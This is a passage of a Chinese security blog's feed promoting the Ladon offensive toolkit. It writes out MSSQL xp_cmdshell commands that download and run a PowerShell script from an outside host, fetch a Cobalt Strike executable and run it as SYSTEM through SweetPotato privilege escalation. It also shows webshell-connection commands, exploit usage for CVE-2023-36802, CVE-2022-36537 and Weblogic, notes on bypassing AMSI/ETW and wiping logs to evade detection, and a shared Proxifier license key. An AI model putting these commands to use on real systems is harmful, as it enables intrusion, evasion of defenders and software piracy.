data-original="https://k8gege.org/k8img/Ladon/exp/lpe/win2016_mssql2016.png"></p><h4 id="ECHO写入BAT执行多行命令提权"><a href="#ECHO写入BAT执行多行命令提权" class="headerlink" title="ECHO写入BAT执行多行命令提权"></a>ECHO写入BAT执行多行命令提权</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exec</span> master..xp_cmdshell <span class="string">'echo whoami > c:\users\public\test.bat'</span></span><br></pre></td></tr></table></figure><p>可ECHO写入添加管理员用户命令或者开3389等操作(举一反三不要只懂WHOAMI)</p><h4 id="使用SYSTEM权限执行BAT"><a href="#使用SYSTEM权限执行BAT" class="headerlink" title="使用SYSTEM权限执行BAT"></a>使用SYSTEM权限执行BAT</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exec</span> master..xp_cmdshell <span class="string">'powershell "IEX (New-Object Net.WebClient).DownloadString('</span><span class="string">'http://xxxx:800/Ladon.ps1'</span><span class="string">'); Ladon SweetPotato "c:\users\public\test.bat""'</span></span><br></pre></td></tr></table></figure><h4 id="Wget下载Coblat-Strkie的EXE"><a href="#Wget下载Coblat-Strkie的EXE" class="headerlink" title="Wget下载Coblat Strkie的EXE"></a>Wget下载Coblat Strkie的EXE</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exec</span> master..xp_cmdshell <span class="string">'powershell "IEX (New-Object Net.WebClient).DownloadString('</span><span class="string">'http://xxxx:800/Ladon.ps1'</span><span class="string">'); Ladon wget http://k8gege.org/cs.exe"'</span></span><br></pre></td></tr></table></figure><h4 id="使用SYSTEM权限执行CS"><a href="#使用SYSTEM权限执行CS" class="headerlink" title="使用SYSTEM权限执行CS"></a>使用SYSTEM权限执行CS</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exec</span> master..xp_cmdshell <span class="string">'powershell "IEX (New-Object Net.WebClient).DownloadString('</span><span class="string">'http://xxxx:800/Ladon.ps1'</span><span class="string">'); Ladon SweetPotato "c:\users\public\cs.exe""'</span></span><br></pre></td></tr></table></figure><h3 id="工具下载"><a href="#工具下载" class="headerlink" title="工具下载"></a>工具下载</h3><p>最新版本:<a href="https://k8gege.org/Download">https://k8gege.org/Download</a><br>历史版本: <a href="https://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/releases</a></p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<h1 id="Ladon提权之PipePotato-BadPotato-EfsPotato-GodPotato-McpPotato-SweetPotato-PrintSpoofer"><a href="#Ladon提权之PipePotato-BadPotato-EfsPotat
</summary>
<category term="提权" scheme="http://k8gege.org/categories/Lpe/"/>
<category term="LPE" scheme="http://k8gege.org/tags/LPE/"/>
<category term="EXP" scheme="http://k8gege.org/tags/EXP/"/>
</entry>
<entry>
<title>〖提权〗cve-2023-36802 Win10/11/2019/2022</title>
<link href="http://k8gege.org/p/cve-2023-36802.html"/>
<id>http://k8gege.org/p/cve-2023-36802.html</id>
<published>2023-11-07T08:11:00.000Z</published>
<updated>2024-11-14T15:02:48.281Z</updated>
<content type="html"><![CDATA[<p></p><h5 id="cve-2023-36802提权"><a href="#cve-2023-36802提权" class="headerlink" title="cve-2023-36802提权"></a>cve-2023-36802提权</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cve-2023-36802 whoami</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/LPE/cve-2023-36802.PNG"></p><h3 id="Download"><a href="#Download" class="headerlink" title="Download"></a>Download</h3><p>PowerLadon: <a href="https://github.com/k8gege/PowerLadon" target="_blank" rel="noopener">https://github.com/k8gege/PowerLadon</a><br>History: <a href="http://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">http://github.com/k8gege/Ladon/releases</a><br>9.1.1:<a href="http://k8gege.org/Download">http://k8gege.org/Download</a><br>11.9:K8小密圈</p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<p></p>
<h5 id="cve-2023-36802提权"><a href="#cve-2023-36802提权" class="headerlink" title="cve-2023-36802提权"></a>cve-2023-36802提权</h5><figure c
</summary>
<category term="LPE" scheme="http://k8gege.org/categories/LPE/"/>
<category term="cve-2023-36802" scheme="http://k8gege.org/categories/cve-2023-36802/"/>
<category term="LPE" scheme="http://k8gege.org/tags/LPE/"/>
</entry>
<entry>
<title>〖Tech〗Ladon PostShell连接CmdShell</title>
<link href="http://k8gege.org/p/PostShell.html"/>
<id>http://k8gege.org/p/PostShell.html</id>
<published>2023-06-05T08:11:00.000Z</published>
<updated>2024-11-14T15:02:49.404Z</updated>
<content type="html"><![CDATA[<p></p><h5 id="230-PostShell连接工具-支持自定义HTTP头提交"><a href="#230-PostShell连接工具-支持自定义HTTP头提交" class="headerlink" title="230 PostShell连接工具,支持自定义HTTP头提交"></a>230 PostShell连接工具,支持自定义HTTP头提交</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">Ladon PostShell <method> <url> <<span class="built_in">pwd</span>> <<span class="built_in">type</span>> <cmd></span><br><span class="line">Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami</span><br><span class="line">Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p</span><br><span class="line">Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p</span><br><span class="line">Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami</span><br><span class="line">Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p</span><br><span class="line">Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p</span><br><span class="line">Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami</span><br><span class="line">Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p</span><br><span class="line">Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p</span><br><span class="line">Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami</span><br><span class="line">Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p</span><br><span class="line">Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p</span><br><span class="line">Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami</span><br><span class="line">Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p</span><br><span class="line">Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p</span><br><span class="line">Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami</span><br><span class="line">Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p</span><br><span class="line">Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p</span><br></pre></td></tr></table></figure><p>Cobalt Strike命令行PostShell<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/cs/cs_postshell.png"></p><p>PostShell连接poswershell后门<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/web_ps1.PNG"></p><p>PostShell连接nodejs后门<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/nodejs_ubuntu.PNG"></p><h3 id="Download"><a href="#Download" class="headerlink" title="Download"></a>Download</h3><p>PowerLadon: <a href="https://github.com/k8gege/PowerLadon" target="_blank" rel="noopener">https://github.com/k8gege/PowerLadon</a><br>History: <a href="http://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">http://github.com/k8gege/Ladon/releases</a><br>9.1.1:<a href="http://k8gege.org/Download">http://k8gege.org/Download</a><br>10.10.6:K8小密圈</p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<p></p>
<h5 id="230-PostShell连接工具-支持自定义HTTP头提交"><a href="#230-PostShell连接工具-支持自定义HTTP头提交" class="headerlink" title="230 PostShell连接工具,支持自定义H
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="WebShell" scheme="http://k8gege.org/categories/WebShell/"/>
<category term="WebShell" scheme="http://k8gege.org/tags/WebShell/"/>
<category term="CmdShell" scheme="http://k8gege.org/tags/CmdShell/"/>
</entry>
<entry>
<title>〖Tech〗Ladon RouterOS/Mikrotik路由器探测</title>
<link href="http://k8gege.org/p/MndpInfo.html"/>
<id>http://k8gege.org/p/MndpInfo.html</id>
<published>2023-06-03T08:11:00.000Z</published>
<updated>2024-11-14T15:02:49.092Z</updated>
<content type="html"><![CDATA[<p></p><h5 id="229-Mndp协议广播探测同网段Mikrotik路由器信息"><a href="#229-Mndp协议广播探测同网段Mikrotik路由器信息" class="headerlink" title="229 Mndp协议广播探测同网段Mikrotik路由器信息"></a>229 Mndp协议广播探测同网段Mikrotik路由器信息</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Ladon MndpInfo</span><br><span class="line">Ladon RouterOS</span><br><span class="line">Ladon Mikrotik</span><br></pre></td></tr></table></figure><p><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/mndp.PNG"></p><h3 id="Download"><a href="#Download" class="headerlink" title="Download"></a>Download</h3><p>PowerLadon: <a href="https://github.com/k8gege/PowerLadon" target="_blank" rel="noopener">https://github.com/k8gege/PowerLadon</a><br>History: <a href="http://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">http://github.com/k8gege/Ladon/releases</a><br>9.1.1:<a href="http://k8gege.org/Download">http://k8gege.org/Download</a><br>11.9:K8小密圈</p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<p></p>
<h5 id="229-Mndp协议广播探测同网段Mikrotik路由器信息"><a href="#229-Mndp协议广播探测同网段Mikrotik路由器信息" class="headerlink" title="229 Mndp协议广播探测同网段Mikroti
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Router" scheme="http://k8gege.org/categories/Router/"/>
<category term="RouterOS" scheme="http://k8gege.org/tags/RouterOS/"/>
<category term="Mikrotik" scheme="http://k8gege.org/tags/Mikrotik/"/>
</entry>
<entry>
<title>〖教程〗Ladon Socks代理扫描(附Proxifier V4.11注册码)</title>
<link href="http://k8gege.org/p/proxy.html"/>
<id>http://k8gege.org/p/proxy.html</id>
<published>2023-05-13T11:30:00.000Z</published>
<updated>2024-11-14T15:02:48.999Z</updated>
<content type="html"><![CDATA[<p>=============================================================================================<br>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="http://k8gege.org/Ladon/proxy.html";</script><h3 id="Socks代理工具"><a href="#Socks代理工具" class="headerlink" title="Socks代理工具"></a>Socks代理工具</h3><h4 id="windows平台"><a href="#windows平台" class="headerlink" title="windows平台"></a>windows平台</h4><p>Proxifier软件是一款极其强大的socks5客户端,同时也是一款强大的站长工具。Proxifier支持TCP,UDP协议,支持Xp,Vista,Win7,支持socks4,socks5,http代理协议可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。</p><p>V4.11 (2022.12.16) Proxifier 现在可以记录和阻止 UDP 连接</p><p>2020年7月proxifier官方发布最新版4.0.1修复ipv6兼容问题,以及其它很多问题。 3.42支持类似chrome这样工作的69个应用程序,修复了一些第三方应用程序的兼容性。</p><p>以上更新日志,充分说明该代理工具不能保证兼容所有第3方程序,或者说兼容性不好,同样的3.31版本有人能代理Ladon,有人代理不了。 </p><p>官方下载: <a href="http://www.proxifier.com/download" target="_blank" rel="noopener">http://www.proxifier.com/download</a></p><h4 id="linux-mac平台"><a href="#linux-mac平台" class="headerlink" title="linux/mac平台"></a>linux/mac平台</h4><p>ProxyChains遵循GNU协议的一款适用于linux系统的网络代理设置工具。强制由任一程序发起的TCP连接请求必须通过诸如TOR 或 SOCKS4, SOCKS5 或HTTP(S) 代理。支持的认证方式包括:SOCKS4/5的用户/密码认证,HTTP的基本认证。允许TCP和DNS通过代理隧道,并且可配置多个代理。</p><p>ProxyChains代理工具非常好,真的可以兼容所有程序,不像proxifier好多程序还不定兼容,当然两者都有一定的丢包率,Ladon批量扫描功能过快超时短,可能会导致有些结果丢失,回头设置一个代理模式,提高超时放慢速度看看。</p><h3 id="代理支持协议"><a href="#代理支持协议" class="headerlink" title="代理支持协议"></a>代理支持协议</h3><p>通过以上两平台的代理工具简介,可以看出代理客户端并不支持ICMP协议。<br>所以使用它们代理,无法PING通内网主机。何况FRP、EW等也不支持ICMP。</p><h4 id="支持协议"><a href="#支持协议" class="headerlink" title="支持协议"></a>支持协议</h4><p>1.TCP<br>2.UDP</p><h4 id="代理协议"><a href="#代理协议" class="headerlink" title="代理协议"></a>代理协议</h4><p>1.SOCKS4<br>2.SOCKS5<br>3.HTTP(S)</p><h3 id="代理工具兼容性"><a href="#代理工具兼容性" class="headerlink" title="代理工具兼容性"></a>代理工具兼容性</h3><p>推荐proxifier 3.42及以上版本,最好是最新版,3.31及以前的兼容性极差,所以不推荐,我使用VM虚拟机12版本的时候,可以代理Ladon,但后面升级为15,发现很难代理,就连测试系统自带的telnet程序,都不行了。Ladon在多个虚拟机测试也是一样,但是有同事也是用3.31却可以代理使用,网上很多人也和我反应不能用。后来我看了下3.31是2016年的,就想看看官方有没更新,发现18年有个3.42版本,测试一下,兼容好多了,然后在星球发表,发表不久发现官方更新了4.0.1,只是他没写更新日志,还以为没有更新。</p><h3 id="Proxifier通用注册码"><a href="#Proxifier通用注册码" class="headerlink" title="Proxifier通用注册码"></a>Proxifier通用注册码</h3><p>4.11 (2022.12.16)<br>4.07 (2021.11.02)<br>4.05 (2021.03.09)<br>4.03 (2020.11.04)<br>4.0.1 (2020.7.7)<br>3.4.2 (2018.8.31)<br>3.3.1 (2016不推荐)</p><p>Standard Edition</p><p>用户名 k8gege.org<br>注册码 5EZ8G-C3WL5-B56YG-SCXM9-6QZAP</p><p><img alt="image" data-original="https://k8gege.org/k8img/posts/Proxy411.PNG"></p><h3 id="Ladon工作原理"><a href="#Ladon工作原理" class="headerlink" title="Ladon工作原理"></a>Ladon工作原理</h3><p>由于proxifier客户端不支持ICMP或者说ew等代理工具也不支持ICMP协议,所以代理后探测存活主机就不要使用Ping或OnlinePC模块了,使用扫描模块需加noping参数,非扫描模块不需要noping。探测存活主机可使用osscan、webscan、urlscan、ms17010、smbghost等模块,他们能扫出东西不也意味着主机存活吗?ping不是唯一的探测存活主机存活方式,系统防火墙默认禁ping,使用ping探测本身就会错过很多存活主机,所以实战要结合多种方式探测。假设目标防火墙只允许smb协议通过,你用nmap端口扫描的TCP包被拦截显示成关的,但用ms17010,smbghost扫出漏洞或者用smbscan就显示密码错误拒绝访问等,这不就说明445确实开放吗?不要死板的老是停留在ping和单纯的端口扫描来探测存活主机,要考虑实际环境,OnlinePC可探测到大部分存活主机,但不等于能探测到全部存活主机,当你无法渗透已扫到的存活主机,就得尝试其它模块探测更多主机。</p><p>PS:如何验证代理是否支持ICMP协议,非常简单用系统自带命令PING目标内网IP(不要PING自己的内网哦),能PING通目标存活IP,说明代理支持ICMP协议,意味你可以像挂了目标VPN一样或者像本地一样随意扫描目标内网,如果根本PING不通,老老实实扫描时加上noping参数。</p><h3 id="Socks代理扫描"><a href="#Socks代理扫描" class="headerlink" title="Socks代理扫描"></a>Socks代理扫描</h3><p>例子:Socks5代理扫描目标10.1.2段是否存在MS17010漏洞<br>Ladon noping 10.1.2.8/24 MS17010</p><p>PS:再次强调,由于代理工具不支持ICMP,所以Ladon扫描类功能必须加noping参数,非扫描模块不需要。</p><h3 id="实战扫描结果"><a href="#实战扫描结果" class="headerlink" title="实战扫描结果"></a>实战扫描结果</h3><p>Linux SSH服务识别之22端口扫描<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/proxy_porscan22.png"></p><p>WEB HttpBanner扫描<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/proxy_httpscan.png"></p><p>永恒之默漏洞 SMBghost CVE-2020-0796<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/proxy_smbghost.png"></p><p>OSSCAN探测目标操作系统<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/proxy_osscan.png"></p><p>ProtScan端口扫描<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/proxy_porscan.png"></p><h3 id="Proxifier-更新日志"><a href="#Proxifier-更新日志" class="headerlink" title="Proxifier 更新日志"></a>Proxifier 更新日志</h3><h4 id="版本-4-11-2022-12-16"><a href="#版本-4-11-2022-12-16" class="headerlink" title="版本 4.11 (2022.12.16)"></a>版本 4.11 (2022.12.16)</h4><pre><code>Proxifier 现在可以记录和阻止 UDP 连接添加了一个主选项,用于控制负责 IP 地址泄漏预防的其他设置(配置文件->高级->DNS 和 IP 泄漏预防模式)添加了阻止非 A/AAAA DNS 查询的选项(配置文件->高级->如果 DNS 通过代理,则阻止非 A/AAAA 查询)可调整的日志窗口字体大小日志窗口呈现问题Proxifier、ProxyChecker 和 ServiceManager 中的多个小修复和改进</code></pre><h4 id="版本-4-07-2021-11-02"><a href="#版本-4-07-2021-11-02" class="headerlink" title="版本 4.07 (2021.11.02)"></a>版本 4.07 (2021.11.02)</h4><pre><code>Windows on ARM 支持服务模式小优化无人值守模式下的安装(例如 SCCM)已修复便携式版本可能会在退出时导致其他应用程序崩溃Windows 高对比度模式支持</code></pre><h4 id="版本-4-05-2021-03-09"><a href="#版本-4-05-2021-03-09" class="headerlink" title="版本 4.05 (2021.03.09)"></a>版本 4.05 (2021.03.09)</h4><pre><code>静默安装和卸载已修复“无法连接到占位符(假)IP 地址”错误已修复启用“DNS over Proxy”时改进的规则处理逻辑对于本地主机连接,IPv4 优先于 IPv6可自定义的假 IP 地址子网改进了与配置文件加载相关的错误处理在 UI 中更新和链接的文档日志窗口自动滚动固定改进的试用和许可证注册体验小的 UI 优化和改进</code></pre><h4 id="版本-4-03-2020-11-04"><a href="#版本-4-03-2020-11-04" class="headerlink" title="版本 4.03 (2020.11.04)"></a>版本 4.03 (2020.11.04)</h4><pre><code>针对 IPv4 映射的 IPv6 连接修复了“无法连接到占位符(假)IP 地址”错误使用多个手动规则(从右键单击上下文菜单创建)时崩溃在某些情况下,启用代理名称解析后,系统连接可能无法正常工作各种小改进</code></pre><h4 id="版本-4-01-2020-10-26"><a href="#版本-4-01-2020-10-26" class="headerlink" title="版本 4.01 (2020.10.26)"></a>版本 4.01 (2020.10.26)</h4><pre><code>发布版本安装/卸载逻辑得到改进拖放配置文件 (*.ppx)负载平衡链现在可以对同一个进程使用同一个代理</code></pre><h4 id="版本-4-01-测试版-3-2020-09-29"><a href="#版本-4-01-测试版-3-2020-09-29" class="headerlink" title="版本 4.01 测试版 3 (2020.09.29)"></a>版本 4.01 测试版 3 (2020.09.29)</h4><pre><code>Proxifier 现在可以作为原生 Windows 服务运行Proxifier服务管理器工具(ServiceManager.exe)介绍Proxifier 便携版现已推出所有二进制文件都已在发布模式下编译由 UDP 端口 53 上的某些特定非 DNS 流量引起的 BSOD配置文件自动更新已修复日志性能得到改善较小的 UI 调整和优化</code></pre><h4 id="版本-4-01-测试版-2-2020-08-19"><a href="#版本-4-01-测试版-2-2020-08-19" class="headerlink" title="版本 4.01 测试版 2(2020.08.19)"></a>版本 4.01 测试版 2(2020.08.19)</h4><pre><code>无法连接到占位符(假)IP 地址错误已修复Proxifier 退出时崩溃详细按钮添加到连接列表窗口不同屏幕日志和文件日志级别的正确处理驱动程序消息:397:g_NfeFlowListSize 太大错误已修复在重载下崩溃窗格自动隐藏时主菜单消失序号 381 无法定位在 ProxifierShellExt.dll 错误已修复其他改进和优化</code></pre><h4 id="版本-4-01-Beta-1"><a href="#版本-4-01-Beta-1" class="headerlink" title="版本 4.01 Beta 1"></a>版本 4.01 Beta 1</h4><p>(2020.07.07)</p><p>初始发行。</p><h3 id="工具下载"><a href="#工具下载" class="headerlink" title="工具下载"></a>工具下载</h3><p>最新版本:<a href="https://k8gege.org/Download">https://k8gege.org/Download</a><br>历史版本: <a href="https://github.com/k8gege/Ladon/releases" target="_blank" rel="noopener">https://github.com/k8gege/Ladon/releases</a><br>Proxifier: <a href="https://github.com/k8gege/K8tools" target="_blank" rel="noopener">https://github.com/k8gege/K8tools</a></p>]]></content>
<summary type="html">
<p>=============================================================================================<br>++++++++++++++++++++++++++++++++++++++++
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Proxy" scheme="http://k8gege.org/tags/Proxy/"/>
</entry>
<entry>
<title>〖Tech〗CVE-2022-36537 未授权RCE漏洞复现</title>
<link href="http://k8gege.org/p/CVE-2022-36537.html"/>
<id>http://k8gege.org/p/CVE-2022-36537.html</id>
<published>2023-04-22T08:11:00.000Z</published>
<updated>2024-11-14T15:02:48.250Z</updated>
<content type="html"><![CDATA[<p>=============================================================================================<br>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</p><script language="javascript" type="text/javascript">window.location.href="/Ladon/CVE-2022-36537.html";</script><h3 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Usage:</span><br><span class="line">Ladon url CVE-2022-36537</span><br><span class="line">Ladon url.txt CVE-2022-36537</span><br></pre></td></tr></table></figure><p>EXP-2022-36537 Zookeeper 未授权文件读取EXP (默认/WEB-INF/web.xml)<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/CVE-2022-36537_EXP.png"><br>批量检测CVE-2022-36537 Server Backup Manager 未授权RCE漏洞 上传是否可用<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/CVE-2022-36537_ISOK.png"><br>端口转发<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/FortForward.png"></p><h3 id="Ladon-10-10-4-20230422"><a href="#Ladon-10-10-4-20230422" class="headerlink" title="Ladon 10.10.4 20230422"></a>Ladon 10.10.4 20230422</h3><p>[u]LadonGUI 文本处理,功能全改成中文(Win8及以上英文系统支持中文)<br>[+]EXP-2022-36537 Zookeeper 未授权文件读取EXP (默认/WEB-INF/web.xml)<br>[+]CVE-2022-36537 Server Backup Manager 未授权RCE漏洞检测 (Zookeeper)<br>[+]INI插件 超时30秒,自动结束进程,防批量PY卡死<br>[+]TXT文件 IP、URL等自动去重,只有str.txt不去重<br>[+]TXT文件 扫描TXT支持自定义线程数,不再默认100<br>[u]SshScan 修复ip.txt时重复扫N多密码的Bug<br>[+]PortForward 端口转发 端口中转<br>[+]默认信息 显示OS版本识别小版本号、.NET最高版本<br>[+]INI插件 支持$ip$、$url$、$tar$、$ip$:$port$、$ip$ $port$参数,自动处理格式,如tar.txt中有IP和URL,$ip$会把url处理成IP<br>[+]INI插件 支持参数处理,如INI里配置$ip$,读取tar.txt内容为<a href="http://192.168.1.8:8099,内容将处理成IP数据192.168.1.8,其他同理">http://192.168.1.8:8099,内容将处理成IP数据192.168.1.8,其他同理</a><br>[+]TXT文件 新增tar.txt、target.txt一样,传入参数为原始内容,如提供的是IP,Ladon不会处理成url,除非INI里指定,或模块自行处理<br>[+]TXT文件 修复读取url.txt host.txt 出现不完整问题,如<a href="http://backup.xxx.org" target="_blank" rel="noopener">http://backup.xxx.org</a> 变成 http:ckup.xx.org 的Bug</p><p>EXP-2022-36537 Zookeeper 未授权文件读取EXP (默认/WEB-INF/web.xml)<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/CVE-2022-36537_EXP.png"><br>批量检测CVE-2022-36537 Server Backup Manager 未授权RCE漏洞 上传是否可用<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/CVE-2022-36537_ISOK.png"><br>端口转发<br><img alt="image" data-original="https://k8gege.org/k8img/Ladon/exe/FortForward.png"></p><h3 id="Ladon-10-10-3-20230410"><a href="#Ladon-10-10-3-20230410" class="headerlink" title="Ladon 10.10.3 20230410"></a>Ladon 10.10.3 20230410</h3><p>[+]FtpServer 迷你FTP服务器,(支持windows/Linux自带ftp命令实现文件上传下载)<br> 默认21 admin admin 可自定义端口 自定义用户、密码<br>[+]TcpServer 监听TCP发包数据 保存TXT和HEX 如SMB RDP HTTP SSH LDAP FTP等协议<br>[+]UdpServer 监听UDP发包数据 保存TXT和HEX 如DNS、SNMP等协议<br>[+]ArpInfo ARP协议探测存活主机IP和MAC,仅支持同一子网<br>[u]WebServer 迷你WEB服务器<br>[u]PortScan 移除9100端口</p><p>Ladon 10.10.2 20230402<br>[+]clsLog 清除崩溃日志、UsageLog日志、清除图标缓存、禁止UsageLog日志记录<br>[u]默认禁止基于.net程序UsageLog日志记录(如各类工具、powershell等)防止蓝队或EDR通过日志审计<br>[u]RunPS 无PowerShell.exe执行*.ps1脚本 新增内存绕过AMSI反病毒查杀接口<br>[+]默认Bypass ETW 绕过部分杀软和EDR监控<br>[+]HPreboot SNMP重启HP打印机 .net>=4.0</p><h3 id="Download"><a href="#Download" class="headerlink" title="Download"></a>Download</h3><p>PowerLadon: <a href="https://github.com/k8gege/PowerLadon" target="_blank" rel="noopener">https://github.com/k8gege/PowerLadon</a><br>History: <a href="http://github.com/k8gege/Ladon" target="_blank" rel="noopener">http://github.com/k8gege/Ladon</a><br>9.1.1:<a href="http://k8gege.org/Download">http://k8gege.org/Download</a></p><div style="text-align: center; width: 710px; border: green solid 0px;"><img alt style="display: inline-block;width: 250px;height: 300px;" data-original="http://k8gege.org/img/k8team.jpg"></div>]]></content>
<summary type="html">
<p>=============================================================================================<br>++++++++++++++++++++++++++++++++++++++++
</summary>
<category term="Ladon" scheme="http://k8gege.org/categories/Ladon/"/>
<category term="Exp" scheme="http://k8gege.org/categories/Exp/"/>
<category term="Exp" scheme="http://k8gege.org/tags/Exp/"/>
<category term="Poc" scheme="http://k8gege.org/tags/Poc/"/>
</entry>
<entry>
<title>〖EXP〗Ladon漏洞复现 CVE-2023-21839 Weblogic</title>
<link href="http://k8gege.org/p/CVE-2023-21839.html"/>
<id>http://k8gege.org/p/CVE-2023-21839.html</id>
<published>2023-03-27T14:10:00.000Z</published>
<updated>2024-11-14T15:02:49.670Z</updated>
<content type="html"><![CDATA[<h3 id="0x00-实验环境"><a href="#0x00-实验环境" class="headerlink" title="0x00 实验环境"></a>0x00 实验环境</h3><p>攻击机:Windows</p><p>靶场:vulhub 12.2.1.3环境</p><h3 id="0x01-影响版本"><a href="#0x01-影响版本" class="headerlink" title="0x01 影响版本"></a>0x01 影响版本</h3><p>允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致 RCE 漏洞</p><p>WebLogic_Server = 12.2.1.3.0<br>WebLogic_Server = 12.2.1.4.0<br>WebLogic_Server = 14.1.1.0.0</p><h3 id="0x02-漏洞复现"><a href="#0x02-漏洞复现" class="headerlink" title="0x02 漏洞复现"></a>0x02 漏洞复现</h3><p>####(1)Ladon T3info模块探测 weblogic版本</p><p>探测到版本代表开启T3协议 版本符合可尝试是否存在漏洞</p><p>Ladon noping 192.168.188.2/24 T3info<br>Ladon 192.168.188.2:7001 T3info<br>Ladon <a href="http://192.168.188.2:7001" target="_blank" rel="noopener">http://192.168.188.2:7001</a> T3info<br>Ladon url.txt T3info<br>Ladon noping ip.txt T3info<br>LadonGo对应模块为T3scan</p><p><img alt data-original="https://mmbiz.qpic.cn/mmbiz_png/ESAML7BuCW6NOBN94RVlzvibkBgt3opm1hEeO8nGRxSNhLAibtnNajiaL4GiasFlEZnlSpI870ZI3jzackRic6gss1Q/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1"></p><p>相关搜索引擎导出url,然后批量检测T3协议</p><p>Ladon url.txt T3info > T3ver.txt</p><p>当然也可以直接检测目标C段是否存在weblogic</p><p>Ladon noping ip24.txt T3info > T3ver.txt<br>Ladon noping 192.168.1.8/24 T3info > T3ver.txt</p><p>####(2)FindIP模块匹配目标</p><p>Key.txt存放LadonGUI处理的目标C段,当然手动也可以,使用</p><p>Ladon FindIP key.txt T3ver.txt</p><p>匹配C段是否出现在结果中,出现则有可能与目标有关,可以尝试GetShell</p><p>图片</p><p>####(3)使用网上开源工具<a 